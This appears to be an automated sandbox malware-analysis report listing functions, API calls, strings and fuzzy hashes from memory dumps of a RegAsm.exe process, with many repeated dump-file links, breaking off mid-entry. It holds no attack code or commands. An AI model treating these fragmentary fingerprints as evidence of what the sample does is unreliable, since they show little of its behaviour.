Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 5caa51e322e81af1be4ceadbe4ea236f7c28ba83958f91cc1dc79586f8736deb
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: CE114B3600114ABBCF126E95CC458EE3F32BB1D354B598416FA2859171D33ACAB2AB86

Uniqueness

Uniqueness Score: -1.00%

Function 00410300 Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,004283B0,00000000,?,00000000,00000000), ref: 0041030E
HeapAlloc.KERNEL32(00000000,?,004283B0,00000000,?,00000000,00000000), ref: 00410315
GetLocalTime.KERNEL32(004283B0,?,004283B0,00000000,?,00000000,00000000), ref: 00410321
wsprintfA.USER32 ref: 0041034D

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: d417de8c9a0a209709a6de5710935ff17af1f368871aa643ccc311d4d337ff47
Instruction ID: db14e26b0bbffc5ca6930250cbb399bf26d4a56846ee06bee85017f3032141ff
Opcode Fuzzy Hash: d417de8c9a0a209709a6de5710935ff17af1f368871aa643ccc311d4d337ff47
Instruction Fuzzy Hash: 69F0BEBA900028BBC7149BDAAC499BFB7FDEF09B02F00514AFA4592180E7784950D3B4

Uniqueness

Uniqueness Score: -1.00%

Function 19A62ABD Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 19C61382
GetLastError.KERNEL32 ref: 19C6138E
___initconout.LIBCMT ref: 19C6139E

Part of subcall function 19C61303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,19C613A3), ref: 19C61316

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 19C613B3

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: 27228bd67395c4a9dddfa77f51f9923c41a15d46cb45fc7a1dde03d7c2172ab2
Instruction ID: 6d0a2b096d429074f31b21cd401f7df6c75b58585d94c0e07186c6203e8ba97c
Opcode Fuzzy Hash: 27228bd67395c4a9dddfa77f51f9923c41a15d46cb45fc7a1dde03d7c2172ab2
Instruction Fuzzy Hash: CEF0A736400179BFCF121FA5DD849893F62FB4CBA2F048164F99E86634EA328D219BC1

Uniqueness

Uniqueness Score: -1.00%

Function 19A7BE80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 19A7C1B5

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: f8d1444ecac278fbf67e424fe915d904ce5dda655a5756d61a89cf7a274c33ee
Instruction ID: 59725ac6864ef09a94c836efa1bb9e13e320c6446f1c167f63a2ee179ad30245
Opcode Fuzzy Hash: f8d1444ecac278fbf67e424fe915d904ce5dda655a5756d61a89cf7a274c33ee
Instruction Fuzzy Hash: F5A127B6D047864FD70C8E28CC42756B7E5AF85A20F1C1B6DF9A1473D1E772D48E8A81

Uniqueness

Uniqueness Score: -1.00%

Function 19BE7300 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

%!.15g, xrefs: 19BE75C3
-, xrefs: 19BE7538

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %!.15g$-
API String ID: 0-583212262
Opcode ID: 12a9be3f2652586aeca2cfa318e88469bef258b422e5214932912f808804b849
Instruction ID: a62a9020e65e169d9101bb52540977e39cbfeb069d09e9cb0535c573afbf6364
Opcode Fuzzy Hash: 12a9be3f2652586aeca2cfa318e88469bef258b422e5214932912f808804b849
Instruction Fuzzy Hash: 18918B71A083468FD304CF6CD89175AFBE4EBC8344F48492DE999C7361E7B9D9098B92

Uniqueness

Uniqueness Score: -1.00%

Function 19AACBF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 19AACE39

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 73d8bd8f9ece8dac361cdd81925df3f2f3bf9095276017865bbe52c9d686b09d
Instruction ID: 1ce78480b03e882220b98c1c5839cce908ef717604d04684bee07372aadbc824
Opcode Fuzzy Hash: 73d8bd8f9ece8dac361cdd81925df3f2f3bf9095276017865bbe52c9d686b09d
Instruction Fuzzy Hash: 7281FF75E043058BE700CE18C881B56B7F9EF84B14F0D4968E995AB292E379E94DC792

Uniqueness

Uniqueness Score: -1.00%

Function 19B878F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

*, xrefs: 19B87982
?, xrefs: 19B8794A

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: *$?
API String ID: 0-2367018687
Opcode ID: a78431c828ec9cfdd63f16af08ac0a07157373a0e2cc83a8877bcc58d0d2fb87
Instruction ID: b2a5347d19fdd6c71fdfe51f5671eff584df51cf5512b14ef56c0b3ff8c82fdc
Opcode Fuzzy Hash: a78431c828ec9cfdd63f16af08ac0a07157373a0e2cc83a8877bcc58d0d2fb87
Instruction Fuzzy Hash: 0D711770A043999FD3108F28C8C071BBBE6EF89708F4C49ADE8C987245E775D9568792

Uniqueness

Uniqueness Score: -1.00%

Function 19A7C8E0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON

Download Yara Rule

Strings

ESCAPE expression must be a single character, xrefs: 19A7CA43
LIKE or GLOB pattern too complex, xrefs: 19A7C94F

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 0-264706735
Opcode ID: e1e1dbc31af02c0569f1b12e30e133b7e223fbf7fe745c9c4b928d673f38009e
Instruction ID: 5f08b420a3a0475a7be63623e7a64be274ec4351b78854f93f77029733bc1336
Opcode Fuzzy Hash: e1e1dbc31af02c0569f1b12e30e133b7e223fbf7fe745c9c4b928d673f38009e
Instruction Fuzzy Hash: AD616975D043525FDB0CCA24C883B7677BAAB42B25F1C4189E8955B3D2D277D48DC351

Uniqueness

Uniqueness Score: -1.00%

Function 19A7D0F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 19A7D213

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 9bce8165aff744e36196e3ccb6976af93e444ea74c62bd0ecedfc760f17636cd
Instruction ID: f891854d219a3866c7e8b53c593767a4107de097ac195298cb607a8aa6c88d0c
Opcode Fuzzy Hash: 9bce8165aff744e36196e3ccb6976af93e444ea74c62bd0ecedfc760f17636cd
Instruction Fuzzy Hash: 0B416A738043424FE7148A28DC4279A7B999F61720F1C4A7CED99937D2E627E50DC3D2

Uniqueness

Uniqueness Score: -1.00%

Function 00406850 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?), ref: 0040689E
GetProcAddress.KERNEL32(?,?), ref: 00406978

Strings

)k@, xrefs: 0040693E, 00406892, 00406991

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: )k@
API String ID: 2574300362-940070785
Opcode ID: 6f71164811d6df8cda258bcf4f135a328c4db8ad1a51c5915c461280e51b821c
Instruction ID: c39d4b3fe26b647a66bf522e9f735de2ad8918ca6e8eb657aee87430fdef1d80
Opcode Fuzzy Hash: 6f71164811d6df8cda258bcf4f135a328c4db8ad1a51c5915c461280e51b821c
Instruction Fuzzy Hash: 69418EB17017059BDB20CF69D8807ABF3E8AF84315F1545BAD84EDB381E639E8258B54

Uniqueness

Uniqueness Score: -1.00%

Function 19A755D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 19A756D1
winDelete, xrefs: 19A7569C

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 0-1405699761
Opcode ID: 1c4bb469d0e5fac962a1ab603446e66955ba8745edd165dcb83e85e391c5b93f
Instruction ID: 7e01130887a3153796b1543985858de8b76b1aa09c4d74075cab7f4936cb6ead
Opcode Fuzzy Hash: 1c4bb469d0e5fac962a1ab603446e66955ba8745edd165dcb83e85e391c5b93f
Instruction Fuzzy Hash: 86315872A003F98BD7182A78DDCA856771EA700E61F0D2676E9CBC31C5F622884D8693

Uniqueness

Uniqueness Score: -1.00%

Function 0040F890 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F905
memcpy.MSVCRT ref: 0040F956

Part of subcall function 0040F7A0: std::_Xinvalid_argument.LIBCPMT ref: 0040F7BA

Strings

string too long, xrefs: 0040F900

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: e85a922af9ebbab45aabda57f093e6fe58dac93bd2c7f3220933ca98c57c2012
Instruction ID: b5ddb5f07250de15edbe22c83bac0e8ada76cede5f33fbd1d3110154bac4181d
Opcode Fuzzy Hash: e85a922af9ebbab45aabda57f093e6fe58dac93bd2c7f3220933ca98c57c2012
Instruction Fuzzy Hash: E631F9333106105BE734AE5CA880A6AF7E9EF95720B20493FF581D7BC0C7799C488399

Uniqueness

Uniqueness Score: -1.00%

Function 19A7D300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 19A7D3D5

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 0957b352968d883f605549dcc317883e726f580ca665be0b6e2c4bd623e58597
Instruction ID: ceddce0bc3d47d0bfa223cee8bace8e6908a14aec898b1c6a9737d7e3232e68d
Opcode Fuzzy Hash: 0957b352968d883f605549dcc317883e726f580ca665be0b6e2c4bd623e58597
Instruction Fuzzy Hash: 7F318E779043145BD71849249C02B667B1D9B81B24F1D42A8FD557F2D2D367E81EC3F1

Uniqueness

Uniqueness Score: -1.00%

Function 19B5DEE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 19B5DF4F
sqlite_stat1, xrefs: 19B5DF30

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
API String ID: 0-3572622772
Opcode ID: cdd801171811845a24f03c7a078311c2033072d29413e281f34b67c0a365d2e7
Instruction ID: a680b3a1f327d2b46a21ba8677cc81b9e26fb5ab917358a74d39a9b82bdddd67
Opcode Fuzzy Hash: cdd801171811845a24f03c7a078311c2033072d29413e281f34b67c0a365d2e7
Instruction Fuzzy Hash: 6C21A275A013415FEB14DF25DC81E6AB7A4EFC1A24B4D466CFC86AB291D320FC06C791

Uniqueness

Uniqueness Score: -1.00%

Function 19BF7E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

OsError 0x%lx (%lu), xrefs: 19BF7ED9

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: OsError 0x%lx (%lu)
API String ID: 0-3720535092
Opcode ID: 89a964c06a4d5313ae0be462f4e23d371bbe50553e8f93cf471862cffb311c91
Instruction ID: deb4763b71daecc6e6c77b2fe1ca9c3de98211b81b9d29f5411da7ab97711969
Opcode Fuzzy Hash: 89a964c06a4d5313ae0be462f4e23d371bbe50553e8f93cf471862cffb311c91
Instruction Fuzzy Hash: B321D031600274ABE7009BB4DC88F5B3BA9FF04A45F0845A9F98DD2194FB30D92AD797

Uniqueness

Uniqueness Score: -1.00%

Function 19A6141F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

GetXStateFeaturesMask, xrefs: 19C40E34
InitializeCriticalSectionEx, xrefs: 19C40E84

Memory Dump Source

